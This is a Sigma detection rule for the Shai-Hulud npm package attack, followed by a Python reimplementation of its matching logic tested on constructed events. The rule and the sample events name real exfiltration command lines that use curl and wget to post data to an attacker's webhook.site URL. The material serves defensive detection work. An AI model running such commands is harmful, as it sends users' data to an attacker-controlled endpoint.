Shai-Hulud NPM Package Malicious Exfiltration via Curl

Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.

Sigma rule

title: Shai-Hulud NPM Package Malicious Exfiltration via Curl
id: efd2eb09-b72e-4a61-8dc7-b1382a1e8983
status: experimental
description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.
references:
    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-09-24
tags:
    - attack.exfiltration
    - attack.t1041
    - attack.collection
    - attack.t1005
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
        CommandLine|contains|all:
            - 'curl'
            - '-d'
            - 'webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7'
    condition: selection
falsepositives:
    - Unlikely
level: high
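To see exactly which process_creation events the selection above would fire on, here is an added example that is not part of the rule or of the SigmaHQ project. It reimplements only the two modifiers the rule uses (`endswith` and `contains|all`, with Sigma's default case-insensitive string matching) rather than calling a Sigma library, and runs them over constructed sample events whose `Image` and `CommandLine` field names follow the rule; the command lines are made up for the test and are not captured telemetry.

```python
"""Evaluate the Shai-Hulud curl exfiltration selection against process_creation events.

Added example, not the rule's or SigmaHQ's own code. The events below are constructed
samples; the matcher implements just the Sigma modifiers this rule relies on.
"""

# Selection copied verbatim from the rule above.
SELECTION = {
    "Image|endswith": "/curl",
    "CommandLine|contains|all": [
        "curl",
        "-d",
        "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7",
    ],
}


def _field_matches(event: dict, key: str, expected) -> bool:
    """Apply one Sigma field condition of the form field|modifier[|all] to an event.

    Sigma compares strings case-insensitively by default, so both sides are lowered.
    Only the modifiers used by this rule are implemented; anything else raises.
    """
    field, *modifiers = key.split("|")
    value = event.get(field)
    if value is None:
        return False
    value = value.lower()
    values = expected if isinstance(expected, list) else [expected]
    values = [v.lower() for v in values]
    if modifiers[0] == "endswith":
        results = [value.endswith(v) for v in values]
    elif modifiers[0] == "contains":
        results = [v in value for v in values]
    else:
        raise ValueError(f"unsupported modifier: {modifiers[0]}")
    # A list of values is OR-ed unless the 'all' modifier is present.
    return all(results) if "all" in modifiers else any(results)


def matches_rule(event: dict) -> bool:
    """True when every field in the selection matches (keys of a Sigma map are AND-ed)."""
    return all(_field_matches(event, k, v) for k, v in SELECTION.items())


def scan(events) -> list:
    """Return the indices of the events that trigger the rule."""
    return [i for i, e in enumerate(events) if matches_rule(e)]


# Constructed sample events (not real telemetry); only the first should alert.
SAMPLE_EVENTS = [
    {   # curl POSTing a file to the webhook URL named in the rule: matches
        "Image": "/usr/bin/curl",
        "CommandLine": "curl -s -X POST -d @/tmp/data.json "
                       "https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7",
    },
    {   # ordinary curl download: no '-d' and no webhook URL, so no match
        "Image": "/usr/bin/curl",
        "CommandLine": "curl -fsSL https://example.com/install.sh -o install.sh",
    },
    {   # same URL but via wget: Image does not end with '/curl', so no match
        "Image": "/usr/bin/wget",
        "CommandLine": "wget --post-data=x "
                       "https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7",
    },
]


if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(f"ALERT event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

The third sample makes the rule's scope explicit: it keys on the curl binary plus one hard-coded webhook.site path, so the same data leaving through another client or another collection endpoint is outside this rule and needs separate coverage.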
